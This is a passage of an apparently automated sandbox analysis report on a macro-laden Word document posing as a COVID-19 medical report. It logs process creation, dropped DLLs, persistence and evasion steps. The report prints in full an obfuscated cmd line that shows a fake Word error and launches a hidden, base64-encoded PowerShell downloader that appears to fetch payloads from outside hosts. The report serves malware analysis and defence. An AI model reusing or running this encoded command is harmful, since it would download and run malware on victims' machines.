MAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogAJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dll ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Giyrh\pugu.vsm',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogAJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdb.dll source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb* source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2089112160.0000000002CB7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2088678601.0000000002840000.00000002.00000001.sdmp
Source: XP-9743 Medical report COVID-19.docInitial sample: OLE summary subject = Licensed Soft Chips TCP capacity Future Savings Account redundant open-source Consultant Cambridgeshire digital Synergistic

Data Obfuscation:

barindex
Document contains an embedded VBA with many GOTO operations indicating source code obfuscationShow sources
Source: XP-9743 Medical report COVID-19.docStream path 'Macros/VBA/Gx8fznt8p0b' : High number of GOTO operations
Source: VBA code instrumentationOLE, VBA macro, High number of GOTO operations: Module Gx8fznt8p0bName: Gx8fznt8p0b
Document contains an embedded VBA with many randomly named variablesShow sources
Source: XP-9743 Medical report COVID-19.docStream path 'Macros/VBA/Gx8fznt8p0b' : High entropy of concatenated variable names
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsA
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAE
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgACQAOABaAEcAIAAgAD0AIABbAHQAWQBwAGUAXQAoACIAewAyAH0AewA1AH0AewAwAH0AewAxAH0AewAzAH0AewA0AH0AIgAtAGYAIAAnAFQARQAnACwAJwBtAC4AJwAsACcAUwB5ACcALAAnAGkAbwAnACwAJwAuAEQASQByAEUAQwB0AE8AUgBZACcALAAnAFMAJwApADsAIAAgACAAJABEADAAQwBxACAAPQAgAFsAVABZAHAAZQBdACgAIgB7ADIAfQB7ADEAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAcwBFAHIAdgBJAEMARQBQAG8AJwAsACcAVABlAG0ALgBuAEUAdAAuACcALAAnAFMAWQBzACcALAAnAGkATgB0AG0AYQAnACwAJwBuAEEARwBFAFIAJwApACAAOwAgACQASgBiAHoAMwB5AGEAYQA9ACQARAA1ADMARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAUgA3ADYAUAA7ACQARwA3ADMATwA9ACgAJwBGACcAKwAoACcAMAAnACsAJwA0AFYAJwApACkAOwAgACAAKAAgACAARwBlAHQALQBWAGEAcgBJAEEAQgBsAGUAIAAoACIAOABaACIAKwAiAGcAIgApACAAIAAtAHYAQQBsAFUAZQBPAE4AIAApADoAOgAiAGMAcgBFAGAAQQBgAFQAZQBEAGkAUgBgAGUAQwB0AGAAbwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB0AEsAJwArACgAJwBMACcAKwAnAEsAJwArACcAagBsADQAOABrAHIAJwApACsAJwB0ACcAKwAoACcASwBMAE4AcQAnACsAJwBtADkAJwApACsAKAAnAHQAJwArACcAeQA5ACcAKQArACcAdAAnACsAJwBLAEwAJwApAC0AcgBlAHAAbABBAGMAZQAgACAAKAAnAHQASwAnACsAJwBMACcAKQAsAFsAQwBIAEEAcgBdADkAMgApACkAOwAkAFAANAAzAFcAPQAoACgAJwBVAF8AJwArACcAMgAnACkAKwAnAFAAJwApADsAIAAgACgAIAAgAGMAaABJAEwAZABpAFQAZQBNACAAVgBhAHIASQBBAEIAbABFADoAZAAwAGMAcQAgACAAKQAuAHYAYQBMAHUAZQA6ADoAIgBzAGAAZQBjAFUAUgBJAHQAYABZAHAAUgBPAHQAYABPAEMAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAMQAnACkAKwAnADIAJwApADsAJABTADgAMgBHAD0AKAAoACcARwA5ACcAKwAnADAAJwApACsAJwBNACcAKQA7ACQARAA2AHQAcgB3ADAAMgAgAD0AIAAoACgAJwBTADkAJwArACcAMwAnACkAKwAnAEUAJwApADsAJABYADYAXwBNAD0AKAAnAEQAMwAnACsAJwAwAFAAJwApADsAJABHADYAYQBqAHYAOABkAD0AJABIAE8ATQBFACsAKAAoACcAewAwACcAKwAnAH0ASwBqAGwANAA4AGsAcgAnACsAJwB7ADAAfQBOAHEAJwArACgAJwBtADkAdAB5ACcAKwAnADkAJwApACsAJwB7ADAAfQAnACkALQBmACAAIABbAEMASABhAHIAXQA5ADIAKQArACQARAA2AHQAcgB3ADAAMgArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFYAMwA1AFUAPQAoACgAJwBTADUAJwArACcAXwAnACkAKwAnAFUAJwApADsAJABKAGkAdABvAGEAMgBlAD0AKAAoACcAdwBdAHgAbQBbAHYAcwAnACsAJwA6AC8ALwByAGUAbQBlAGQAJwArACcAaQBpACcAKwAnAHMALgAnACsAJwBjACcAKwAnAG8AJwArACcAbQAvAHQALwBnAG0AMgBYAC8AQAAnACsAJwB3ACcAKQArACgAJwBdAHgAJwArACcAbQBbAHYAOgAnACsAJwAvAC8AYQB2AGEAJwApACsAKAAnAGQAbgAnACsAJwBhAG4AJwApACsAKAAnAHMAYQAnACsAJwBoACcAKQArACcAaQBuACcAKwAoACcALgBjACcAKwAnAG8AbQAnACkAKwAoACcALwAnACsAJwB3AHAAJwArACcALQBpAG4AYwAnACkAKwAnAGwAdQAnACsAKAAnAGQAZQAnACsAJwBzAC8AdwAvAEAAJwApACsAJwB3ACcAKwAnAF0AJwArACgAJwB4ACcAKwAnAG0AWwAnACkAKwAoACcAdgA6AC8ALwAnACsAJwBzAG8AbAAnACsAJwBpAGMAbwAnACkAKwAnAG4AJwArACgAJwAuAHUAcwAnACsAJwAvAGEAbABsAGEAJwArACcAbQAnACsAJwAtAGMAeQAnACkAKwAoACcAYwBsAGUAJwArACcALQAxAGMANAAnACkAKwAoACcAZwBuACcAKwAnAC8AZgA1ACcAKQArACcAegAvACcAKwAoACcAQAAnACsAJwB3AF0AJwApACsAKAAnAHgAJwArACcAbQBbACcAKwAnAHYAOgAvACcAKwAnAC8AdwB3AHcALgByAGkAcABhAHIAYQB6AGkAJwArACcAbwBuACcAKwAnAGkAJwArACcALQAnACkAKwAoACcAcgBhAGQAaQAnACsAJwBvACcAKQArACcAdAB2ACcAKwAnAC4AYwAnACsAKAAnAG8AbQAnACsAJwAvAHMAbwAnACkAKwAnAGYAdAAnACsAKAAnAGEAYwAnACsAJwB1ACcAKQArACgAJwBsACcAKwAnAG8AdQBzAC8AJwArACcARABaAHoALwAnACkAKwAnAEJump to behavior
Source: S93E.dll.5.drStatic PE information: real checksum: 0x60901 should be: 0x5c940
Source: S93E.dll.5.drStatic PE information: section name: .text4
Source: S93E.dll.5.drStatic PE information: section name: .text5
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001698 push ebp; retf 7_2_1000169A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10001113 push esp; ret 7_2_10001131
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0019E8D0 push edx; ret 7_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0018388E push esi; retf 7_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183A42 push ebx; retf 7_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00183272 push edi; ret 7_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00184BAB push ebp; iretd 7_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_001823D7 push cs; iretd 7_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0019E8D0 push edx; ret 8_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0018388E push esi; retf 8_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00183A42 push ebx; retf 8_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00183272 push edi; ret 8_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00184BAB push ebp; iretd 8_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_001823D7 push cs; iretd 8_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0019E8D0 push edx; ret 9_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0018388E push esi; retf 9_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183A42 push ebx; retf 9_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00183272 push edi; ret 9_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00184BAB push ebp; iretd 9_2_00184BB9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001823D7 push cs; iretd 9_2_001823D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0015E8D0 push edx; ret 10_2_0015E9D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0014388E push esi; retf 10_2_001438BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00143A42 push ebx; retf 10_2_00143A44
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00143272 push edi; ret 10_2_00143273
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00144BAB push ebp; iretd 10_2_00144BB9
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001423D7 push cs; iretd 10_2_001423D8
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0019E8D0 push edx; ret 11_2_0019E9D4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0018388E push esi; retf 11_2_001838BD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00183A42 push ebx; retf 11_2_00183A44
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00183272 push edi; ret 11_2_00183273
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00184BAB push ebp; iretd 11_2_00184BB9

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Kjl48kr\Nqm9ty9\S93E.dllJump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Giyrh\pugu.vsmJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Giyrh\pugu.vsm:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ivtnyogqxjx\ctmhexvkrv.xdn:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ipdtn\rmgx.ktd:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Fmtjatw\czosow.gcn:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp:Zone.Identifier read attributes | deleteJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
